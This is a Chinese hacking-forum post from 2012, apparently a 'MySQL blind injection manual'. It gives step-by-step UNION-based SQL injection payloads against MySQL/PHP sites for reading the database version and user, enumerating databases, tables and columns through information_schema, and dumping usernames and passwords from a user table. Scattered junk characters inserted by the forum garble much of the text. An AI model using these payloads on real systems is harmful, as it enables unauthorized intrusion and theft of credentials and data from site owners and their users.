中国网络渗透测试联盟

标题: mysql盲注手册 [打印本页]
作者: admin    时间: 2012-9-13 16:27
标题: mysql盲注手册

  L: Z! Z5 g, G" P6 @( {% c教程内容:Mysql 5+php 注入( ?9 ^; @. b, V

2 w  K% J( i$ o: D1 R* |
7 f1 q7 S* E+ _6 Q/ d
4 k; z, i9 H# d7 C一.查看MYSQL基本信息(库名,版本,用户)$ _; U; i) u) F% `4 d1 e

6 T/ u7 s# i* t4 O- ~and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*/ |2 D) j4 r- \

6 E  t  `3 y/ T# k1 @# ~4 c二.查数据库
5 a% `) O& V. ^+ a8 p7 Z& I4 \2 D# ^# C- ^$ L4 @
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
! Z8 S. H4 U, h) i- Olimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
6 a# \) B; K! q( Q6 C/ W% o" b/ X
三.暴表1 Q* P! a1 I% G- y& o  a7 L
$ d8 Z( V: [2 U4 U6 G9 u8 R
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
$ N5 o9 P( i& {% _
& T+ s! B2 q  Glimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
& ]7 r0 T) X8 G4 ^+ [
2 k. e+ q9 O: [四.暴字段' y. _8 h& r6 P8 C/ c2 m
5 e& ?! v6 T+ U; ~- v! F7 M
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
# L' J# h/ V. O" a6 X" R  C7 P* L
, F. Y1 ?# `& }" g" t. blimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
+ k$ y$ f% a; N: |% O. H  ?2 I$ H7 ~
五.暴数据' c6 J" n: e1 b2 M* y1 m

1 V0 Q( t* x- A  F9 z. Z, \. X8 h; Z' z; Fand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
. |1 ^. z" T& w5 g/ R* U( V
1 Y$ a+ ~' \( [; N4 ]/ |
- X1 S. L7 \( E4 p- H这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
8 _! t; \0 H; ^  c0 K1 Y



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2